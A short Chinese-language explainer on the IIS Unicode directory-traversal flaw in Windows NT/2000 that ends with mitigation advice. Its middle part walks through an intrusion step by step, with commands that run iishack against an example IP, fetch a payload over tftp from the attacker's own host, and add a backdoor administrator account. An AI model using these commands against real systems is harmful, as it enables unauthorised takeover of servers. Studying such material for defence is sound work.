IIS是“Internet Information Server”的缩写,微软公司的Web服务器,是Windows 2000以上级别操作系统自带的一个组件,通过它来实现Web服务器的功能。
Unicode漏洞是一个专门攻击IIS的漏洞,Unicode漏洞是最容易让入侵者得手的一个漏洞,可以不费吹灰之力改掉默认主页,重则删除硬盘上的数据,高手甚至可以轻松获取Administrator权限!
由于Windows NT/2000操作系统的普及率比较高,所以很容易使它成为很多黑客攻击的目标。目前,Windows NT/2000最主要的Unicode漏洞一共有四种,分别针对不同语言的操作系统。分别为:%c1%1c、%c0%cf、%c1%pc、%c0%9v。例如第一个 %c1%1c 的问题。c1 1c,中文简体里面没有这个字,按照正常的情况,根据内码转换文件\winnt\system32\c_936.nls会编码成“?”。但对简体中文版IIS中 c1 1c解码成了(c1-c0)*40+1c=5c=“\”。此编码发生在IIS检测处理路径串中的“\”之后,所以可以突破IIS路径访问到上级目录。
被攻击迹象
黑客一般都采用IIS HACK攻击法进行攻击,但是需要工具“Iishack”(注:Iishack.exe是攻击NT 4.0的,Iishack1.exe是攻击NT 5.0的) Netcat和TFTP还有Netdde。
一般入侵者的攻击手法是这样的:
首先,将TFTP装到机器里面,将自己的机器变成一个FTP服务器。然后,搜索到NT机器的IP地址来进行攻击,例如:192.168.0.10。
“c:\iishack 192.168.0.10 80 99 ”
如果显示攻击成功的话,黑客就可以再输入:
“c:\telnet 192.168.0.10 99 ”
可以进入到“c:\winnt\system32\”里面,然后入侵者会运行“c:\winnt\system32\tftp -i <自己的IP地址> get netdde.exe ”然后再运行Netdde.exe文件,建立一个账号,将它的权限提升到Administrators组:
“c:\winnt\system32\netdde.exe net user make love /add ”
“c:\winnt\system32\netdde.exe net localgroup administrators make /add”
然后退出来,用“net use \\192.168.0.10\ipc$ love /user:make”建立IPC连接以进行非法入侵。
被攻击的机器,入侵者可以利用漏洞修改主页;删除硬盘上的东西;建立代理服务器,危害非常大。
解决方法
限制网络用户访问和调用“CMD”命令的权限;若没必要使用“Scripts”和“Msadc”目录,删除或改名;安装Windows NT系统时不要使用默认“WINNT”路径,改为其他的文件夹,如“C:\mywindowsnt”。